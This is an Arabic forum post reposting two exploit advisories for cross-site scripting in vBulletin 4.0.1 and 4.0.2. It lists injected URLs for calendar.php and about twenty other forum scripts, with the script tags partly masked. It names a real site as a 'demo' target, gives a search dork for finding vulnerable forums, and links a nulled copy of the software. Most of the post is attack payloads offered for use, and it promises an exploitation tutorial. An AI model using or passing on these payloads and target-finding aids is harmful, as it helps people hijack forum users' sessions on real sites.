:: vBspiders Professional Network :: - تغرتين في منتديات النسخة vb 4.0.x

بسم الله الرحمن الرحيم
الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين
السلام عليكم ورحمة الله وبركاته

اليكم التغرات

كود PHP:

   ===================================

vBulletin v 4.0.1 XSS Vulnerability

===================================

 
[+] Script: vBulletin Version 4.0.1

[+] Vendor: www.vbulletin.com

[+] Author: W4n73d

 
[~] Bug: Cross Site Scripting (XSS)

[~] Exploit: http://[HOST]/forum/calendar.php="***************("! XSS

!");</script>

[~] Demo: http://www.overbr.com.br/forum/calendar.php="***************("! XSS

!");</script>

 
 
 
# Inj3ct0r.com [2010-02-15]

كود PHP:

   ==========================================

vBulletin  Version 4.0.2 Xss Vulnerability

==========================================

 
========================================================================================                  

| # Title    : vBulletin  Version 4.0.2 Cross Site Scripting in URI Vulnerability      

| # Author   : indoushka                                                                                                 

| # Web Site : http://www.digzip.com/files/54QE0JXS/vbulletin_4.0.2nulledfinal.rar                                                     

| # Dork     : Powered by vBulletin? Version 4.0.2                                                                                                              

| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       

| # Bug      : XSS                                                                     

======================      Exploit By indoushka       =================================

# Exploit  :  

 

http://127.0.0.1/upload/calendar.php?acuparam=>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/faq.php?acuparam=>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/forum.php?acuparam=>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/usercp.php/>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/subscription.php?acuparam=>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/showthread.php?acuparam=>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/showgroups.php/>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/sendmessage.php/>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/search.php/>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/register.php?acuparam=>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/profile.php?acuparam=>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/private.php?acuparam=>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/online.php/>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/newthread.php?acuparam=>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/misc.php/>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/memberlist.php?=>"'>***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/member.php/>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/inlinemod.php?acuparam=>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/index.php/>">***************(213771818860)</ScRiPt>

 
http://127.0.0.1/upload/forumdisplay.php?acuparam=>">***************(213771818860)</ScRiPt>

 
 
 
# Inj3ct0r.com [2010-02-20]

قريبا درس استغلال تغرات Xss